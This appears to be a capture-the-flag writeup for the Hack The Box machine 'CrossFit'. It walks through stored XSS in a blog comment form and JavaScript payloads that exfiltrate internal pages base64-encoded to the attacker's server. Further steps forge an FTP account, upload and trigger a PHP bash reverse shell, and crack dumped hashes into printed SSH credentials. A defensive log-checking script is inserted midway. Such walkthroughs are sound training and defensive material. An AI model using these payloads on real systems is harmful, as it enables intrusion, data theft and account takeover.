CrossFit Hack The Box Writeup

 CROSSFIT_USER_WRITEUP_DETAILED

 

OS: Linux
Difficulty: Insane
Points: 50
Release: 19 Sep 2020
IP: 10.10.10.208

 

 

NMAP


 PORT   STATE  SERVICE VERSION  
 21/tcp  open   ftp   vsftpd 2.0.8 or later  
 | ssl-cert: Subject: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US  
 | Not valid before: 2020-04-30T19:16:46  
 |_Not valid after: 3991-08-16T19:16:46  
 |_ssl-date: TLS randomness does not represent time  
 22/tcp  open   ssh   OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)  
 | ssh-hostkey:   
 |  2048 b0:e7:5f:5f:7e:5a:4f:e8:e4:cf:f1:98:01:cb:3f:52 (RSA)  
 |  256 67:88:2d:20:a5:c1:a7:71:50:2b:c8:07:a4:b2:60:e5 (ECDSA)  
 |_ 256 62:ce:a3:15:93:c8:8c:b6:8e:23:1d:66:52:f4:4f:ef (ED25519)  
 80/tcp  open   http  Apache httpd 2.4.38 ((Debian))  
 |_http-server-header: Apache/2.4.38 (Debian)  
 |_http-title: Apache2 Debian Default Page: It works  
 50500/tcp filtered unknown  

PORT 80

 

Port 80: nothing interesting, just the default Apache page.

It’s a dead end. I tried gobuster/ffuf and found nothing, so I ran nmap once more against specific ports, starting with FTP on 21.

FTP:21

 PORT  STATE SERVICE REASON     VERSION  
 21/tcp open ftp   syn-ack ttl 63 vsftpd 2.0.8 or later  
 | ssl-cert: Subject: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb  
 | Issuer: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2020-04-30T19:16:46  
 | Not valid after: 3991-08-16T19:16:46  
 | MD5:  557c 36e4 424b 381e eb17 708a 6138 bd0f  
 | SHA-1: 25ec d2fe 6c9d 7704 ec7d d792 8767 4bc3 8d0e cbce  
 |_ssl-date: TLS randomness does not represent time  
 Service Info: Host: Cross  

Yes, we have a vhost, in the certificate’s email address:

 emailAddress=info@gym-club.crossfit.htb   

gym-club.crossfit.htb

 

 

After some enumeration I found a comment form; let’s try something in it.

blog-single.php


 

First I captured the request in Burp and tried various things like XSS.

I changed the User-Agent field and the comment field to a payload that calls back to my Python SimpleHTTPServer:

 

 <script src="http://10.10.14.8:8001/"></script>  

 

BURP INTERCEPTED VALUE

 POST /blog-single.php HTTP/1.1  
 Host: gym-club.crossfit.htb  
 User-Agent: <script src="http://10.10.14.78:8001/"></script>  
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
 Accept-Encoding: gzip, deflate  
 Content-Type: application/x-www-form-urlencoded  
 Content-Length: 154  
 Origin: http://gym-club.crossfit.htb  
 Connection: close  
 Referer: http://gym-club.crossfit.htb/blog-single.php  
 Upgrade-Insecure-Requests: 1  
 name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.8:8001/"></script>&submit=submit  

 RESULT

 ┌──(sakthi㉿kali)-[~]  
 └─$ python -m SimpleHTTPServer 8001                                        
 Serving HTTP on 0.0.0.0 port 8001 ...  
 10.10.10.208 - - [14/03/2021 08:19:27] "GET / HTTP/1.1" 200 -  

 

Now I tried everything, but nothing worked, so I thought about other ways: we need to attack ftp.crossfit.htb.

But the question is where we find that subdomain.

After some trial and error I understood that we need to reach it from localhost: using the XSS, we can see another vhost that only accepts requests from the local machine, and that host is ftp.crossfit.htb.

 

How to create an HTTP request in JS?

Refer to this blog.

With the help of that article I found a way to communicate with ftp.crossfit.htb.

So what we do now is create a .js file called sakthi.js that sends the response page of ftp.crossfit.htb to our Python server.

Let’s try this real quick....

 

STEP 1

Create a file called sakthi.js:

  • sakthi.js 

 

 myhttpserver = 'http://10.10.14.78/'  
 targeturl = 'http://ftp.crossfit.htb/'  
 req = new XMLHttpRequest;  
 req.onreadystatechange = function() {  
   if (req.readyState == 4) {  
       req2 = new XMLHttpRequest;  
       req2.open('GET', myhttpserver + btoa(this.responseText),false);  
       req2.send();  
     }  
 }  
 req.open('GET', targeturl, false);  
 req.send();  

 

STEP 2

Open a Python simple HTTP server in the working directory where the sakthi.js file exists.

 

Now capture the comment form request, send it to the Repeater tab and add the value shown in the image:

 

 <script src="http://10.10.14.78/sakthi.js"></script>  

 

 

BURP REQUEST

 POST /blog-single.php HTTP/1.1  
 Host: gym-club.crossfit.htb  
 User-Agent: <script src="http://10.10.14.78/sakthi.js"></script>  
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
 Accept-Encoding: gzip, deflate  
 Content-Type: application/x-www-form-urlencoded  
 Content-Length: 93  
 Origin: http://gym-club.crossfit.htb  
 Connection: close  
 Referer: http://gym-club.crossfit.htb/blog-single.php  
 Upgrade-Insecure-Requests: 1  
 name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.78:8001/"></script>&submit=submit  

 

 

Let’s send the request and check our Python server.

 

 ┌──(sakhi@kali)-[~/hackthebox/machine/crossfit]  
 └─# python3 -m http.server 80  
 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  
 10.10.10.208 - - [15/Mar/2021 08:45:54] "GET /sakthi.js HTTP/1.1" 200 -  
 10.10.10.208 - - [15/Mar/2021 08:45:55] code 404, message File not found  
 10.10.10.208 - - [15/Mar/2021 08:45:55] "GET /PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RlRQIEhvc3RpbmcgLSBBY2NvdW50IE1hbmFnZW1lbnQ8L3RpdGxlPgogICAgPGxpbmsgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvdHdpdHRlci1ib290c3RyYXAvNC4wLjAtYWxwaGEvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CjwvaGVhZD4KPGJvZHk+Cgo8YnI+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctMTIgbWFyZ2luLXRiIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icHVsbC1sZWZ0Ij4KICAgICAgICAgICAgICAgIDxoMj5GVFAgSG9zdGluZyAtIEFjY291bnQgTWFuYWdlbWVudDwvaDI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwdWxsLXJpZ2h0Ij4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJidG4gYnRuLXN1Y2Nlc3MiIGhyZWY9Imh0dHA6Ly9mdHAuY3Jvc3NmaXQuaHRiL2FjY291bnRzL2NyZWF0ZSI+IENyZWF0ZSBOZXcgQWNjb3VudDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KCiAgICAKICAgIDx0YWJsZSBjbGFzcz0idGFibGUgdGFibGUtYm9yZGVyZWQiPgogICAgICAgIDx0cj4KICAgICAgICAgICAgPHRoPk5vPC90aD4KICAgICAgICAgICAgPHRoPlVzZXJuYW1lPC90aD4KICAgICAgICAgICAgPHRoPkNyZWF0aW9uIERhdGU8L3RoPgogICAgICAgICAgICA8dGggd2lkdGg9IjI4MHB4Ij5BY3Rpb248L3RoPgogICAgICAgIDwvdHI+CgogICAgICAgIAogICAgPC90YWJsZT4KCiAgICAKCjwvZGl2PgoKPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -  

 

It gives us a base64 string.

Let’s decode this and see what inside.

 

 <!DOCTYPE html>  
 <html>  
 <head>  
   <title>FTP Hosting - Account Management</title>  
   <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">  
 </head>  
 <body>  
 <br>  
 <div class="container">  
     <div class="row">  
     <div class="col-lg-12 margin-tb">  
       <div class="pull-left">  
         <h2>FTP Hosting - Account Management</h2>  
       </div>  
       <div class="pull-right">  
         <a class="btn btn-success" href="http://ftp.crossfit.htb/accounts/create"> Create New Account</a>  
       </div>  
     </div>  
   </div>  
   <table class="table table-bordered">  
     <tr>  
       <th>No</th>  
       <th>Username</th>  
       <th>Creation Date</th>  
       <th width="280px">Action</th>  
     </tr>  
   </table>  
 </div>  
 </body>  
 </html>  

 

It’s the HTML code of the ftp.crossfit.htb website.

If you’re not convinced, let’s open it in a browser.

It’s an FTP Hosting - Account Management page.
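As an added, defender-side example that is not part of the original writeup: a small Python checker that flags the two traces this chain leaves in an Apache combined-format access log, a <script> tag in the User-Agent (or Referer/path) and a request path that is one long base64 blob, which it decodes the same way the btoa() exfil above encodes it. The log format, the length threshold and the sample lines are assumptions; the sample lines are constructed.

```python
import base64
import re

# Apache "combined" log format (assumption: the servers log in this format).
# Quoted fields may contain backslash-escaped quotes, as Apache writes them.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
SCRIPT_RE = re.compile(r'<\s*script\b|javascript:', re.IGNORECASE)
# The exfil trick in this writeup requests btoa(responseText) as the path,
# so a path that is one long run of base64 characters is worth decoding.
B64_PATH_RE = re.compile(r'^/([A-Za-z0-9+/]{64,}={0,2})$')


def decode_b64_path(path):
    """Return the decoded text if the whole path is a base64 blob, else None."""
    m = B64_PATH_RE.match(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace')
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None


def analyse_line(line):
    """Parse one combined-format line; return its findings, or None if unparseable."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    findings = []
    for field in ('ua', 'referer', 'path'):
        if SCRIPT_RE.search(m.group(field)):
            findings.append('script tag in ' + field)
    decoded = decode_b64_path(m.group('path'))
    if decoded is not None:
        findings.append('base64 blob in path')
    return {'ip': m.group('ip'), 'path': m.group('path'),
            'findings': findings, 'decoded': decoded}


def analyse_log(lines):
    """Return only the parsed entries that have at least one finding."""
    return [r for r in (analyse_line(ln) for ln in lines) if r and r['findings']]


# Constructed sample lines modelled on the requests shown in this writeup.
EXFIL_PAGE = '<!DOCTYPE html><title>FTP Hosting - Account Management</title>'
SAMPLE_LOG = [
    '10.10.14.78 - - [15/Mar/2021:08:45:50 +0000] "GET /blog-single.php HTTP/1.1" '
    '200 4312 "-" "Mozilla/5.0"',
    '10.10.14.78 - - [15/Mar/2021:08:45:52 +0000] "POST /blog-single.php HTTP/1.1" '
    '200 512 "http://gym-club.crossfit.htb/blog-single.php" '
    '"<script src=\\"http://10.10.14.78/sakthi.js\\"></script>"',
    '10.10.10.208 - - [15/Mar/2021:08:45:55 +0000] "GET /'
    + base64.b64encode(EXFIL_PAGE.encode()).decode() + ' HTTP/1.1" 404 - "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in analyse_log(SAMPLE_LOG):
        print(hit['ip'], hit['findings'], (hit['decoded'] or '')[:40])
```

Run it against a real access log with `analyse_log(open('access.log'))`; the second finding only fires when the whole path decodes, so a normal long asset name does not trip it.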

Let’s create a new user.

But first let’s check the URL behind the Create New Account button.


 http://ftp.crossfit.htb/accounts/create  

 

sakthi.js

 

 myhttpserver = 'http://10.10.14.78/'  
 targeturl = 'http://ftp.crossfit.htb/accounts/create'  
 req = new XMLHttpRequest;  
 req.onreadystatechange = function() {  
   if (req.readyState == 4) {  
       req2 = new XMLHttpRequest;  
       req2.open('GET', myhttpserver + btoa(this.responseText),false);  
       req2.send();  
     }  
 }  
 req.open('GET', targeturl, false);  
 req.send();  

Let’s send the request again in Burp.

And we got the response:

 

 ┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]  
 └─# python3 -m http.server 80  
 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  
 10.10.10.208 - - [15/Mar/2021 08:55:42] "GET /sakthi.js HTTP/1.1" 200 -  
 10.10.10.208 - - [15/Mar/2021 08:55:42] code 404, message File not found  
 10.10.10.208 - - [15/Mar/2021 08:55:42] "GET /PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RlRQIEhvc3RpbmcgLSBBY2NvdW50IE1hbmFnZW1lbnQ8L3RpdGxlPgogICAgPGxpbmsgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvdHdpdHRlci1ib290c3RyYXAvNC4wLjAtYWxwaGEvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CjwvaGVhZD4KPGJvZHk+Cgo8YnI+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAKPGRpdiBjbGFzcz0icm93Ij4KICAgIDxkaXYgY2xhc3M9ImNvbC1sZy0xMiBtYXJnaW4tdGIiPgogICAgICAgIDxkaXYgY2xhc3M9InB1bGwtbGVmdCI+CiAgICAgICAgICAgIDxoMj5BZGQgTmV3IEFjY291bnQ8L2gyPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InB1bGwtcmlnaHQiPgogICAgICAgICAgICA8YSBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBocmVmPSJodHRwOi8vZnRwLmNyb3NzZml0Lmh0Yi9hY2NvdW50cyI+IEJhY2s8L2E+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KPC9kaXY+CgoKPGZvcm0gYWN0aW9uPSJodHRwOi8vZnRwLmNyb3NzZml0Lmh0Yi9hY2NvdW50cyIgbWV0aG9kPSJQT1NUIj4KICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Il90b2tlbiIgdmFsdWU9IkJobURaQWlMN0JDc01kbnRvOXIwTnlyVW5yTldQcFhZRE1HbEVtQ08iPgogICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29sLXhzLTEyIGNvbC1zbS0xMiBjb2wtbWQtMTIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIj4KICAgICAgICAgICAgICAgIDxzdHJvbmc+VXNlcm5hbWU6PC9zdHJvbmc+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idXNlcm5hbWUiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIHBsYWNlaG9sZGVyPSJVc2VybmFtZSI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImNvbC14cy0xMiBjb2wtc20tMTIgY29sLW1kLTEyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8c3Ryb25nPlBhc3N3b3JkOjwvc3Ryb25nPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwYXNzIiBjbGFzcz0iZm9ybS1jb250cm9sIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wteHMtMTIgY29sLXNtLTEyIGNvbC1tZC0xMiB0ZXh0LWNlbnRlciI+CiAgICAgICAgICAgICAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tcHJpbWFyeSI+U3VibWl0PC9idXR0b24+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KCjwvZm9ybT4KCjwvZGl2PgoKPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 
404 -  

 

Again, decode it and open it in a browser.

 

 <!DOCTYPE html>  
 <html>  
 <head>  
   <title>FTP Hosting - Account Management</title>  
   <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">  
 </head>  
 <body>  
 <br>  
 <div class="container">  
 <div class="row">  
   <div class="col-lg-12 margin-tb">  
     <div class="pull-left">  
       <h2>Add New Account</h2>  
     </div>  
     <div class="pull-right">  
       <a class="btn btn-primary" href="http://ftp.crossfit.htb/accounts"> Back</a>  
     </div>  
   </div>  
 </div>  
 <form action="http://ftp.crossfit.htb/accounts" method="POST">  
   <input type="hidden" name="_token" value="BhmDZAiL7BCsMdnto9r0NyrUnrNWPpXYDMGlEmCO">  
    <div class="row">  
     <div class="col-xs-12 col-sm-12 col-md-12">  
       <div class="form-group">  
         <strong>Username:</strong>  
         <input type="text" name="username" class="form-control" placeholder="Username">  
       </div>  
     </div>  
     <div class="col-xs-12 col-sm-12 col-md-12">  
       <div class="form-group">  
         <strong>Password:</strong>  
         <input type="password" name="pass" class="form-control" placeholder="Password">  
       </div>  
     </div>  
     <div class="col-xs-12 col-sm-12 col-md-12 text-center">  
         <button type="submit" class="btn btn-primary">Submit</button>  
     </div>  
   </div>  
 </form>  
 </div>  
 </body>  
 </html>  

There are two fields: username and password.

But the tricky part is that, if you look at the source code, there is a hidden field called _token whose value changes dynamically, so if we create a payload to register a user we need to grab the _token value from the page first.

After some trial and error I created a payload to register a user.

createuser.js

 

 myhttpserver = 'http://10.10.14.78'  
 targeturl = 'http://ftp.crossfit.htb/accounts/create'  
 username = 'sakthi'  
 password = 'sakthi2'  
 req = new XMLHttpRequest;  
 req.withCredentials = true;  
 req.onreadystatechange = function() {  
   if (req.readyState == 4) {  
     req2 = new XMLHttpRequest;  
     req2.open('GET', myhttpserver + btoa(this.responseText), false);  
     req2.send();  
   }  
 }  
 req.open('GET', targeturl, false);  
 req.send();  
 regx = /token" value="(.*)"/g;  
 token = regx.exec(req.responseText)[1];  
 var params = '_token=' + token + '&username=' + username + '&pass=' + password + '&submit=submit'  
 req.open('POST', "http://ftp.crossfit.htb/accounts", false);  
 req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');  
 req.send(params);  

 

Now send the request in Burp with this createuser.js file, like this:

 

 <script src="http://10.10.14.78/createuser.js"></script>  

 

 POST /blog-single.php HTTP/1.1  
 Host: gym-club.crossfit.htb  
 User-Agent: <script src="http://10.10.14.8/createuser.js"></script>  
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
 Accept-Encoding: gzip, deflate  
 Content-Type: application/x-www-form-urlencoded  
 Content-Length: 93  
 Origin: http://gym-club.crossfit.htb  
 Connection: close  
 Referer: http://gym-club.crossfit.htb/blog-single.php  
 Upgrade-Insecure-Requests: 1  
  name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.78:8001/"></script>&submit=submit   

 

Let’s check the Python listener, which received the request:

 10.10.10.208 - - [15/Mar/2021 09:05:09] "GET /createuser.js HTTP/1.1" 200 -  

Then I used lftp to connect to the FTP server.

 

 ┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]  
 └─# lftp  
 lftp :~> set ftp:ssl-force true  
 lftp :~> connect 10.10.10.208  
 lftp 10.10.10.208:~> set ssl:verify-certificate no   
 lftp 10.10.10.208:~> login sakthi  
 lftp sakthi@10.10.10.208:~> ls  
 drwxrwxr-x  2 33    1002     4096 Sep 21 09:45 development-test  
 drwxr-xr-x  13 0    0      4096 May 07 2020 ftp  
 drwxr-xr-x  9 0    0      4096 May 12 2020 gym-club  
 drwxr-xr-x  2 0    0      4096 May 01 2020 html  
 lftp sakthi@10.10.10.208:/>  

 

 

We find another subdomain: development-test.crossfit.htb.

Let’s add this to our /etc/hosts file.

If you look closely, we have read and write access to the development-test directory.

That means we can upload a PHP reverse shell and trigger it with our rev.js file.

STEP 1

Create a file called rev.php.

rev.php

 

 <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.78/9988 0>&1'") ?>  

 

 

STEP 2

Create another file called rev.js that will request our rev.php:

rev.js

 

 req = new XMLHttpRequest;  
 req.open('GET',"http://development-test.crossfit.htb/rev.php");  
 req.send();  

 

STEP 3

Start your Python server in the directory where all the files are, along with a netcat listener.

 

 ┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]  
 └─# ls  
 createuser.js sakthi.js rev.js rev.php  
 ┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]  
 └─# python3 -m http.server 80  
 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  

 

STEP 4

Upload rev.php to the development-test directory over FTP.


 ┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]  
 └─# lftp                                                     
 lftp :~> set ftp:ssl-force true  
 lftp :~> connect 10.10.10.208  
 lftp 10.10.10.208:~> set ssl:verify-certificate no  
 lftp 10.10.10.208:~> login sakthi   
 lftp luci@10.10.10.208:~> ls  
 drwxrwxr-x  2 33    1002     4096 Sep 21 09:45 development-test  
 drwxr-xr-x  13 0    0      4096 May 07 2020 ftp  
 drwxr-xr-x  9 0    0      4096 May 12 2020 gym-club  
 drwxr-xr-x  2 0    0      4096 May 01 2020 html  
 lftp luci@10.10.10.208:/> cd development-test  
 lftp luci@10.10.10.208:/development-test> ls  
 lftp luci@10.10.10.208:/development-test> put rev.php  
 69 bytes transferred in 17 seconds (9 B/s)      
 lftp luci@10.10.10.208:/development-test> ls  
 -rw-r--r--  1 1002   1002      69 Nov 28 14:30 rev.php  

 

STEP 5

Go to the Burp Repeater tab, change the payload to rev.js and send it:

 

 POST /blog-single.php HTTP/1.1  
 Host: gym-club.crossfit.htb  
 User-Agent: <script src="http://10.10.14.78/rev.js"></script>  
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
 Accept-Encoding: gzip, deflate  
 Content-Type: application/x-www-form-urlencoded  
 Content-Length: 90  
 Origin: http://gym-club.crossfit.htb  
 Connection: close  
 Referer: http://gym-club.crossfit.htb/blog-single.php  
 Upgrade-Insecure-Requests: 1  
 name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.78:8001/"></script>&submit=submit  

 

 

Now let’s check our Python server and the netcat listener:


 10.10.10.208 - - [15/Mar/2021 09:29:23] "GET /rev.js HTTP/1.1" 200 -  

 

 ┌──(sakthi@kali)-[~]  
 └─# nc -lvp 9988  
 Ncat: Version 7.91 ( https://nmap.org/ncat )  
 Ncat: Listening on :::9988  
 Ncat: Listening on 0.0.0.0:9988  
 Ncat: Connection from 10.10.10.208.  
 Ncat: Connection from 10.10.10.208:37118.  
 id  
 bash: cannot set terminal process group (712): Inappropriate ioctl for device  
 bash: no job control in this shell  
 www-data@crossfit:/var/www/development-test$ id  
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  
 www-data@crossfit:/var/www/development-test$ whoami  
 whoami  
 www-data  

 

 

Now let’s run linPEAS.

 

Linpeas

 

After analyzing the output I found some hashes:


 [+] Looking for specific hashes inside files - less false positives (limit 70)  
 /etc/ansible/playbooks/adduser_hank.yml:$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/  
 /var/www/ftp/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi  

 

HASHES

 

 $6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/  
 $2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi  

 

 


Let’s crack it with john.

 

 ┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]  
 └─# john -w=/usr/share/wordlists/rockyou.txt hash  
 Warning: only loading hashes of type "sha512crypt", but also saw type "bcrypt"  
 Use the "--format=bcrypt" option to force loading hashes of that type instead  
 Using default input encoding: UTF-8  
 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])  
 Cost 1 (iteration count) is 5000 for all loaded hashes  
 Will run 4 OpenMP threads  
 Press 'q' or Ctrl-C to abort, almost any other key for status  
 powerpuffgirls  (?)  
 1g 0:00:00:05 DONE (2020-11-28 09:51) 0.1919g/s 4618p/s 4618c/s 4618C/s tajmahal..hunibuni  
 Use the "--show" option to display all of the cracked passwords reliably  
 Session completed  

 

And we got the password: powerpuffgirls.

This hash belongs to the user hank, as we saw in the linPEAS result.

Let’s SSH in and get our user.txt flag.

 SSH CREDENTIALS

 User --- hank

 Password -- powerpuffgirls

user.txt

 ROOT FLAG


UPDATE SOON...

 

 
